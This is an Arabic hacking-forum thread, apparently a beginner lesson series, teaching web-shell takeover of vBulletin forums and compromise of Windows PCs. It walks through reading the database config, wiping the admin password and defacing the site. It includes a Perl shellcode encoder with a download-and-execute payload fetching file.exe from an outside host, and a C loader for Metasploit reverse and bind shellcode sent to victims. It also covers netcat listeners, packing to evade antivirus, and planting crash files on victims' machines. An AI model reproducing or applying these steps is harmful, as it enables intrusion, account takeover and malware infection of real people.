    طيب حلوبس لازم نحط بصمه الاختراق على ظهر المنتدى كيف؟
    دلوقتى هاشرح لكم واحده واحده
    اول شئ ندخل من الشيل على public_htm
    وندخل على مجلد المنتدى الي اهو vb أو fourm

    وطبعا احنا نعرف مجلد الانكلود الي من خلاله نقدر نفتح الكونفيق
    ونشوف معلومات القواعد والمنتدى

    طيب ندخل ملف الانكلود






    بعد ما ندخل راح نشوف ملفات كثير ومن بينها الكونفيق






    ندخل الكونفيج ونشوف البيانات طبعا راح تشوف كلام كثير جدا بالكونفيج
    ومن ضمن الكلام بيانات القواعد والمنتدى




    نحفظ البيانات بالــ txt




    بعد ما حفظنا البيانات راح تلاحظ فوق بالشيل مكتوب من ضمن القواعد
    هالكلمه SQL اضغط عليها وادخل وراح تشوف الشكل




    طبعا اكتب باسوورد واليوزر نيم للقاعده مثل الي طالعلك بالكونفيق
    الي انت سجلتهم بالتكست اكتبهم واضغط كونيكت وانتظر قليلا

    راح تلاحظ ان نقلك الي داخل قواعد البيانات




    طبعا الان احنا بنروح لقواعد المنتدى علشان ندخل بعضوية الادمن
    ونلعب شوي بالحسابات طبعا ولو كان السيرفر ON راح تقدر تسوي هالطريقه
    وهذا ما يميز شيل C99

    طبعا الان ندخل لقواعد بيانات المنتدى




    دخلنا القواعد الحين ونبحث لقائمه user
    وندخل عليها




    بعد ما ندخل نبحث لعضويه رقم 1 وهو الادمن ونضغط edit






    دلوقتى دخلنا احنا جدول بيانات الادمن ونبحث عن الباسوورد المشفر
    ونعطيه Delete نمسحه نهائي




    بعد ما نمسحه لا تمسح شئ بعده انزل اسفل الصفحه
    واضغط على Confirm




    ومن ثم اضغط على yes




    الان خلصنا شغلنا تقريبا ادخل المنتدى www.xxxxxx.com/vb or fourm
    ونسجل اسم عضويه الادمن admin والباسوورد لا شئ ونضغط تسجيل دخول




    نشوف شنو بيصير؟!!







    مبروك دخول عضويه الادمن يعني انت شبه مدير عام للموقع كامل
    مع المنتدى,,

    دام انك ادمن وعرفت قواعد البيانات والباسووردات بتعرف تغير الاندكس
    بسهوله ويسر,, بسيطه اذا كان التصريحه عطاك كامل drwxrwxrwx

    تقدر تعدل على الاندكس وتحط كود الاندكس للاختراق وبس

    انتهى الشرح واتمنى يكون واضح وسهل

    DJONI
    DJONI
    المدير العام على مجموعة مواقع STARMEDIA
    المدير العام على مجموعة مواقع STARMEDIA


    ذكر
    عدد الرسائل : 358
    العمر : 40
    الجنسية : Tunisien
    السٌّمعَة : 1
    نقاط : 18351
    تاريخ التسجيل : 22/06/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty رد: سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف DJONI الأربعاء 7 يناير - 19:23

    الدرس الخامس

    بسم الله الرحمن الرحيم
    ،
    ،
    ،


    --[ المقدمة]--
    موضوعي اليوم يتحدث عن الثغرات الطفح و حجب الخدمة
    وشرح طريقة الاختراق باستخدام الشيل كود والهدف من موضوعي
    هوا تعلم طرق الاختراق الاحترافية
    والاستغناء عن برامج الاختراق





    --[الثغرات]--

    ثغرات الطفح (remote buffer) التي سأتحدث عنها اليوم هي التي
    تسمح باختراق الأجهزة بملف HTML
    عندما نسمع كلمة ثغرات نعتقد أنها شيء معقد
    لكنها بسيطة جدا وما نحتاج إلا ان نجد ثغرة مناسبة
    نذهب إلى موقع ميلورم milw0rm - exploits : vulnerabilities : videos : papers : ****lcode

    والثغرات التي سوف أتحدث عنها نجدها في قسم (remote)




    وعلينا إيجاد ثغرة تكون في نظام الوندوز
    أعطيكم شرح مبسط لطريقة عملها
    نأخذ مثال على ثغرة


    كود:
    Program Checker (sasatl.dll 1.5.0.531)
    DebugMsgLog Heap Spraying Exploitوهذا رابط الثغرة
    Program Checker (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit
    سوف يفيد كثيراً إذا كنت تجيد اللغة الانجليزية
    لأنها تختلف طريقة كتابة المعلومات من ثغرة لثغرة


    كود:
    sasatl.dll is a library included in the Program Checker
    Pro software package from the Company Zenturi.
    http://www.programchecker.comوتعني أن الثغرة توجد بملف sasatl.dll
    وهذا الملف نجده في برنامج program checker
    وموقع البرنامج
    ProgramChecker - The online resource to your computer's programs!
    والثغرة تشتغل فقط على من يستخدم البرنامج هذا

    وتمت التجربة على


    كود:
    Tested In- Windows XP SP1/SP2 English/French with IE 6.0 / 7.0.
    - Windows vista Professional English/French SP1 with IE 7.0وطريقة إستخدامها لتحميل السيرفر وتشغيله في جهاز الضحية هيا كالتالي :

    في البداية ننسخ كود ال HTML الذي في أسفل الصفحة

    ونلصقه بالمفكرة
    ويوجد دائماً في الثغرات المشابهة لهذه الثغرة كود unescape
    وهوا عبارة عن ****lcode مشفر
    وهذا شيل كود جاهز وطريقة تشفيره سهلة
    لاحظ معي الأداة التالية


    كود PHP:
    $html = "FezO.txt";
    $FeezO =
    "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\ x56\ x8B\x76\x20\x03".
    "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\ x14\ x28\x38\xF2\x74".
    "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\ x75\ xE7\x5E\x8B\x5E".
    "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\ xDD\ x8B\x04\x8B\x03".
    "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\ x6C\ x00\x43\x3A\x5C".
    "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\ x30\ x78\x0C\x8B\x40".
    "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\ x40\ x34\x8D\x40\x7C".
    "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\ xFF\ xFF\xFF\x83\xEC".
    "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\ x1A\ x2F\x70\xE8\x6F".
    "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\ xDB\ x53\x53\x52\xEB".
    "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\ x53\ xFF\xFF\xFF\x83".
    "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\ xE2\ x73\xE8\x40\xFF".
    "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF".
    "http://3asfh.com/file.exe";

    if ($ARGV[0] eq ''){
    $Fz0 = $FeezO;$fez0 = $ARGV[1];$fez0 = "http://pan";

    }
    #citation to ****sploit
    sub dongu {
    my $FeeezO = shift;
    my $Feeez0 = shift() || 'LE';
    my $feeez0 = '';

    my $idx = 0;

    if (length($FeeezO) % 2 != 0) {
    $data .= substr($FeeezO, -1, 1);
    }

    while ($idx < length($FeeezO) - 1) {
    my $c1 = ord(substr($FeeezO, $idx, 1));
    my $c2 = ord(substr($FeeezO, $idx+1, 1));
    if ($Feeez0 eq 'LE') {
    $feeez0 .= sprintf('%%u%.2x%.2x', $c2, $c1);
    } else {
    $feeez0 .= sprintf('%%u%.2x%.2x', $c1, $c2);
    }
    $idx += 2;
    }

    return $feeez0;
    }
    $Fez00 = dongu($Fz0);
    #_
    $body = <<BODY;

    ****lcode unescape("%u9090%u9090$Fez00");



    BODY

    print H $body;

    print "
    [================================================== ======================
    [// FeezO ****lcodes Encoder v1.0
    [//
    [// fez0\@hotmail.com
    [//
    [================================================== ======================
    ";

    print "Encoded ****lcode=\n\n unescape(\"%u9090%u9090$Fez00\") \n\nDone.. Have fune "

    انسخ الكود بالكامل والصقه بالمفكرة
    واستبدل الرابط الذي بداخله برابط السيرفر الخاص بك



    (
    بالطبع الاداة مكتوبة بالبيرل
    وسوف تحتاج المترجم الخاص بها)

    بعد استبدال الرابط نفتحها عن طريق موجة الأوامر




    لآحظ الاداة اعطتنا الشيل كود جاهز
    والآن نرجع إلى محور حديثنا .. الثغرة
    ونستبدل الشيل كود





    والآن نحفظ الصفحة بإمتداد HTML أو HTM
    وأصبحت جاهز للإختراق
    عند فتحها سوف يتحمل السيرفر في جهاز الضحية

    ،
    ،
    ،


    نأخذ طرق آخرى لإستخدام الثغرات
    هذه طريقة إستخدمنا فيها شيل كود Download and Execute

    تحدثت سابقاً عن انواعها وطريقة الحصول عليها من موقع ميتاسبلويت
    وتوجد طريقة اخرى وهيا عبر البرنامج ( برنامج ميتاسبلويت )

    وهيا عن طريق كتابة الآوامر التالية

    Show PAYLOADS




    واكتب الأمر use وبعده اسم ال payload الذري تريد استخدامه




    والآن أكتب show options
    لتعبئة البيانات التي تريد استخدامها



    لتعديل البيانات اكتب الآمر set
    وبعد الانتهاء اكتب generate
    وسوف ينتجلك الشيل كود



    لكي نستخدمها في الثغرة السابقة يجب علينا تشفير الكود
    بنفس الطريقة السابقة وبنفس الآداة
    وهيا كالتالي
    ننسخ الشيل كود
    ونلصقه في الاداة



    ونحفظ المستند بإمتداد pl مع تصحيح بعض الرموز عند الاستبدال
    ونشغله عن طريق موجة الاوامر



    وسوف يأتينا الشيل كود مشفر
    وننسخه ونستبدله بالكود المشفر الذي في الثغرة

    وانتهينا

    الخلاصة هيا :

    عندما نستخدم ثغرة من الثغرات التي تسمح لنا الاختراق بملف html
    يجب علينا في البداية صنع شيل كود ومن ثم تشفيره
    وبعدها استبداله بالشيل كود الموجود بالثغرة ولكن توجد ثغرات
    لا تحتاج إلى تشفير ولكن استبدال الشيل كود مباشرة

    ,

    وتوجد ثغرات كثيره تنزل يومياً في مواقع الحماية
    لكن يجب علينا ان نبحث عن ثغرة في برنامج مشهور ويكثر استخدامه
    مثل ثغرات المتصفح



    ،
    ،
    ،
    ،

    نأتي الآن لثغرات حجب الخدمة (denial of service)
    الثغرات هذه لا تسمح باختراق الجهاز
    فقط تقوم ب ( تعليقه )
    وهيا سهلة ولا تحتاج أي تعب أو خبرة
    وهيا تكون عبر ارسال ملف ولا يجب ان يكون exe
    وسوف يسبب تعليق في جهاز المرسل اليه
    وتوجد ملفات تعلق الجهاز عند فتحها
    وبعضها لا تحتاج إلى فتح
    أكمل القراءة أن لم تفهم ما أقصده

    من موقع ميلورم إذهب إلى (dos/poc)



    والثغرات كثيرة وأكثرها تقوم بنفس العمل
    ولكن اختلافها يكون في نوع الملف المصاب

    ونأخذ مثال على هذه ثغرة Ms Windows GDI+ICO File
    وهذا رابطها MS Windows GDI+ ICO File Remote Denial of Service Exploit

    إفتح الرابط الذي في الثغرة
    وحمل الملف ولكن لا تفتح ضغط عنه
    فقط اسحبه إلى مجلد فارغ
    ولآحظ ماذا يحدث عند فتح هذا المجلد

    ( بطئ في الجهاز ويتسبب في غلق المجلد)

    هذا يعني عندما تخترق جهاز احدهم
    ضع هذا الملف في جميع مجلداته
    ،
    وسوف تسبب له إزعاج شديد

    ،
    ،
    ،
    يتبع
    DJONI
    DJONI
    المدير العام على مجموعة مواقع STARMEDIA
    المدير العام على مجموعة مواقع STARMEDIA


    ذكر
    عدد الرسائل : 358
    العمر : 40
    الجنسية : Tunisien
    السٌّمعَة : 1
    نقاط : 18351
    تاريخ التسجيل : 22/06/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty رد: سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف DJONI الأربعاء 7 يناير - 19:24


    لن أدخل في مقدمات عن إستخدامها
    تحدث في القسم الأول في الموضوع عن استخدام ال ****lcodes
    في الثغرات

    لكنا دعنا نتحدث عن طريقة استخدامها مباشرة
    دون اللجوء إلى ثغرة
    بمعنى أن نقوم بتحويلها إلى ملف exe
    ويتم ارسالها إلى الضحية وإختراق جهازه
    و برامج الحماية مثل الكاسبر لا تكشفها
    وتحدثت في القسم الاول في الموضوع لطريقة استخدام الثغرة لتحميل ملف وتشغيله في جهاز الضحية
    إذاً لو حولنا هذا ال ****lcode مباشرة إلى ملف exe
    سوف يصبح عندنا (داونلودر) مشفر ...
    وهكذا على حسب نوع ال ****lcode الذي نقوم بتحويله

    ،
    ،

    إن لم تكن تفهم ماذا يعني ال ****lcode
    تابع القراءة وسوف تفهم
    ،
    ،


    في البداية إذهب إلى هذا الموقع
    http://****sploit.com:55555/PAYLOADS

    (ملاحظة ضع كلمه m e t a مكان النجوم)
    واختر windows reverse ****l



    Reverse = تعني اتصال عكسي
    ومثل برامج الاتصال العكسي
    اكتب الاي بي الخاص بك
    والمنفذ



    وإظغط على Generate




    والآن انسخ الشيل كود مثل الصورة التي بالأسفل



    وإفتح المفكرة
    واكتب فيها الكود الذي بالأسفل


    كود:
    #include
    char ****lcode[]=
    "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\ x5b\ x81\x73\x13\xf3"
    "\x75\x47\x94\x83\xeb\xfc\xe2\xf4\x0f\x9d\x03\ x94\ xf3\x75\xcc\xd1"
    "\xcf\xfe\x3b\x91\x8b\x74\xa8\x1f\xbc\x6d\xcc\ xcb\ xd3\x74\xac\xdd"
    "\x78\x41\xcc\x95\x1d\x44\x87\x0d\x5f\xf1\x87\ xe0\ xf4\xb4\x8d\x99"
    "\xf2\xb7\xac\x60\xc8\x21\x63\x90\x86\x90\xcc\ xcb\ xd7\x74\xac\xf2"
    "\x78\x79\x0c\x1f\xac\x69\x46\x7f\x78\x69\xcc\ x95\ x18\xfc\x1b\xb0"
    "\xf7\xb6\x76\x54\x97\xfe\x07\xa4\x76\xb5\x3f\ x98\ x78\x35\x4b\x1f"
    "\x83\x69\xea\x1f\x9b\x7d\xac\x9d\x78\xf5\xf7\ x94\ xf3\x75\xcc\xfc"
    "\xcf\x2a\x76\x62\x93\x23\xce\x6c\x70\xb5\x3c\ xc4\ x9b\x85\xcd\x90"
    "\xac\x1d\xdf\x6a\x79\x7b\x10\x6b\x14\x16\x26\ xf8\ x90\x5b\x22\xec"
    "\x96\x75\x47\x94";


    main()
    {
    void (*routine) ();
    (long) routine = &****lcode;
    routine();
    }واستبدل فيها ال ****lcode الخاص بك
    وإحفظها بإمتداد c
    بالطبع نحتاج إلى مترجم لتحويل الملف إلى exe
    وتوجد مترجمات كثيرة
    لكن لن اتحدث عنها لأنها ليست محور حديثنا

    ،
    ،

    بعد تحويل الملف إلى exe
    إرسله إلى الضحية



    ،
    ،

    والآن نتنصت بإستخدام أداة النت كات
    (الاداة تأتي مع برنامج ميتاسبلويت)
    أو يمكن تحميلها بشكل منفصل من الرابط التالي
    http://www.vulnwatch.org/netcat/nc111nt.zip

    نتنصت بالنت كات ... بإستخدام الأمر التالي


    كود:
    -l –n –v –p port

    بالطبع نكتب نفس البورت الذي كتبناه في البداية عند انشاء الشيل كود
    والآن ارسل الشيل كود للضحية
    وعندما يفتحه سوف يتصل مع النت كات

    وتستطيع الآن تصفح ملفات الضحية



    ،
    ،
    ،


    والآن الاختراق ب الاتصال المباشر

    ،
    ،
    في البداية اذهب الى موقع ميتاسبلويت
    http://****sploit.com:55555/PAYLOADS
    واختر windows bind ****l


    واكتب المنفذ الذي تريد فتحه في جهاز الضحية


    واضغط على Generate
    وننسخ الشيل كود ونضعه في الكود السابق
    ونحفظها بامتداد c
    ونترجمها إلى ملف exe
    والآن نرسل الشيل كود للضحية
    ونتصل بجهازه بإداة putty

    ( الأداة هذه مرفقة مع برنامج ميتاسبلويت)
    وتستطيع تحميلها بشكل منصل من الرابط ادناه
    http://the.earth.li/~sgtatham/putty/.../x86/putty.exe

    شرح الآداة ...
    Host name (or ip address) =آي بي الضحية
    Port= لمنفذ المفتوح بجهاز الضحية
    وضع النقطة على Raw
    واضغط على open
    وسوف تفتح لك شاشة الأوامر متصلة بجهاز الضحية

    وتستطيع من برنامج النت كات الاتصال بجهاز الضحية
    وتكون عبر الأمر التالي

    كود:
    -v -n ip port،
    ،
    ،
    أما بالنسبة لإستخدام ال Download And Execute
    فهيا بسيطة جداً

    في البداية إذهب إلى الرابط أدناه
    http://****sploit.com:55555/PAYLOADS...64%65%78%65%63

    وفي مربع DATA
    اكتب رابط السيرفر الخاص بك

    وافعل كما شرحت أعلاه
    ،
    ،
    ،

    ملاحظات بسيطه
    تستطيع بعد عمل ال****lcode ان تضغطه ببرامج الضغط مثل ال upx
    والأفضل أن تدمجه مع ملف exe آخر عن طريق أداة iexpress
    في الوندوز
    وجعل ال****lcode لا يظهر عند التشغيل
    لأنه عند تشغيله تأتي شاشة الدوس السوداء وهيا الطريقة الافضل للتخلص منها


    --------------------------------------------------------------------
    مع تحياتي

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) 533962773


    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) 139501519

      مواضيع مماثلة

      -

      الوقت/التاريخ الآن هو الجمعة 26 أبريل - 11:04